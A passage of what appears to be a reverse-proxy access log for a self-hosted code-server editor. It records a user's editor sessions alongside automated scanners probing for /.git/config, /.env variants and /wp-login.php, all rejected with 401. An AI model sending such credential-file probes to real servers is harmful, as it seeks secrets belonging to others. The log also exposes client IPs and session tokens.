84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=e0beea97-6add-4449-952c-e6e85d9e0902&parentId=1&origin=e0beea97-6add-4449-952c-e6e85d9e0902&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:54 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:51:22 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/xterm/lib/xterm.js" [Client 84.1.26.27] [Length 127841] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:51:23 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-unicode11/lib/addon-unicode11.js" [Client 84.1.26.27] [Length 16968] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:51:23 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-clipboard/lib/addon-clipboard.js" [Client 84.1.26.27] [Length 2502] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:51:23 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-progress/lib/addon-progress.js" [Client 84.1.26.27] [Length 694] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:51:23 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-webgl/lib/addon-webgl.js" [Client 84.1.26.27] [Length 111901] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:51:23 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-serialize/lib/addon-serialize.js" [Client 84.1.26.27] [Length 5648] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:53:00 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-ligatures/lib/addon-ligatures.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:07:01:20 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:07:01:20 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=ce7adb66-be15-44d9-94e1-f8590ff51119&parentId=1&origin=ce7adb66-be15-44d9-94e1-f8590ff51119&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11491] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:07:01:20 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=ce7adb66-be15-44d9-94e1-f8590ff51119" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=ce7adb66-be15-44d9-94e1-f8590ff51119&parentId=1&origin=ce7adb66-be15-44d9-94e1-f8590ff51119&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" +[20/Jan/2026:07:01:22 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:07:01:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/output/common/outputLinkComputerMain.js" [Client 84.1.26.27] [Length 47321] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:07:24:58 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 34.91.100.7] [Length 36] [Gzip -] [Sent-to code-server] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[20/Jan/2026:07:24:58 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 34.91.100.7] [Length 1038] [Gzip -] [Sent-to code-server] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[20/Jan/2026:08:44:14 +0000] - 401 401 - POST https code.profibot.hu "/" [Client 85.11.167.4] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://code.profibot.hu" +[20/Jan/2026:08:44:14 +0000] - 401 401 - POST https code.profibot.hu "/" [Client 85.11.167.4] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://code.profibot.hu" +[20/Jan/2026:09:34:37 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36" "-" +[20/Jan/2026:10:27:55 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 34.34.253.145] [Length 29] [Gzip -] [Sent-to code-server] "Python/3.11 aiohttp/3.13.3" "-" +[20/Jan/2026:10:27:56 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 34.34.253.145] [Length 1038] [Gzip -] [Sent-to code-server] "Python/3.11 aiohttp/3.13.3" "-" +[20/Jan/2026:10:27:57 +0000] - 200 200 - GET http code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 34.34.253.161] [Length 685] [Gzip -] [Sent-to code-server] "python-httpx/0.28.1" "-" +[20/Jan/2026:10:28:05 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 34.34.253.240] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:10:28:05 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 34.34.253.240] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:10:28:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 34.34.253.240] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:10:28:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 34.34.253.240] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:10:28:05 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 34.34.253.240] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:10:28:05 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 34.34.253.240] [Length 4213] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:11:43:53 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.54] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-" +[20/Jan/2026:11:49:35 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.254.106.197] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.254.106.197] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[20/Jan/2026:11:49:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.254.106.197] [Length 804] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.254.106.197] [Length 464] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 401 401 - GET https code.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 84.254.106.197] [Length 8489] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.254.106.197] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.254.106.197] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 401 401 - GET https code.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 401 401 - GET https code.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.254.106.197] [Length 4226] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:49:36 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.254.106.197] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:54:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 18.209.176.65] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" +[20/Jan/2026:12:44:24 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:13:05:25 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 18.143.167.5] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[20/Jan/2026:13:05:26 +0000] - 200 200 - POST https code.profibot.hu "/login" [Client 18.143.167.5] [Length 1051] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[20/Jan/2026:13:52:49 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 172.86.73.109] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64)" "-" +[20/Jan/2026:14:02:25 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 18.143.167.5] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[20/Jan/2026:14:02:25 +0000] - 200 200 - POST https code.profibot.hu "/login" [Client 18.143.167.5] [Length 1051] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[20/Jan/2026:14:31:42 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vscode-oniguruma/release/main.js" [Client 84.1.26.27] [Length 4405] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:14:31:42 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vscode-textmate/release/main.js" [Client 84.1.26.27] [Length 17260] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:14:31:42 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fpython%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:14:31:42 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vscode-oniguruma/release/onig.wasm" [Client 84.1.26.27] [Length 132983] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:14:31:43 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fpython%2Fsyntaxes%2FMagicPython.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 12050] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:14:31:43 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/textMate/browser/backgroundTokenization/worker/textMateTokenizationWorker.workerMain.js" [Client 84.1.26.27] [Length 76569] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:15:16:28 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=16d2077c-a418-4634-a569-8377ae05f5ed&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1611782] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:15:16:28 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=cca0f4dd-cad1-46fa-8e17-e30a238c3775&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 479724] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:15:31:10 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 104.196.147.169] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[20/Jan/2026:15:31:10 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 104.196.147.169] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://code.profibot.hu" +[20/Jan/2026:16:01:58 +0000] - 401 401 - GET http code.profibot.hu "/wp-login.php" [Client 206.189.13.3] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[20/Jan/2026:17:01:19 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.155] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[20/Jan/2026:18:43:14 +0000] - 401 401 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:18:43:14 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:18:43:14 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:18:43:14 +0000] - 401 401 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:22:37:23 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 206.168.34.197] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:37:25 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 206.168.34.197] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:37:26 +0000] - 401 401 - GET https code.profibot.hu "/./_static/src/browser/media/favicon-dark-support.svg" [Client 206.168.34.197] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:37:28 +0000] - 401 401 - GET https code.profibot.hu "/./_static/src/browser/media/pwa-icon-192.png" [Client 206.168.34.197] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:37:30 +0000] - 401 401 - GET https code.profibot.hu "/./_static/src/browser/media/pwa-icon-512.png" [Client 206.168.34.197] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:37:34 +0000] - 401 401 - GET https code.profibot.hu "/favicon.ico" [Client 206.168.34.197] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:41:09 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 167.94.138.33] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:41:18 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 167.94.138.33] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:41:24 +0000] - 401 401 - GET http code.profibot.hu "/./_static/src/browser/media/favicon-dark-support.svg" [Client 167.94.138.33] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:41:29 +0000] - 401 401 - GET http code.profibot.hu "/./_static/src/browser/media/pwa-icon-192.png" [Client 167.94.138.33] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:41:36 +0000] - 401 401 - GET http code.profibot.hu "/favicon.ico" [Client 167.94.138.33] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:23:41:48 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.254.106.197] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.254.106.197] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.254.106.197] [Length 804] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 401 401 - GET https code.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.254.106.197] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.254.106.197] [Length 464] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.254.106.197] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 401 401 - GET https code.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] 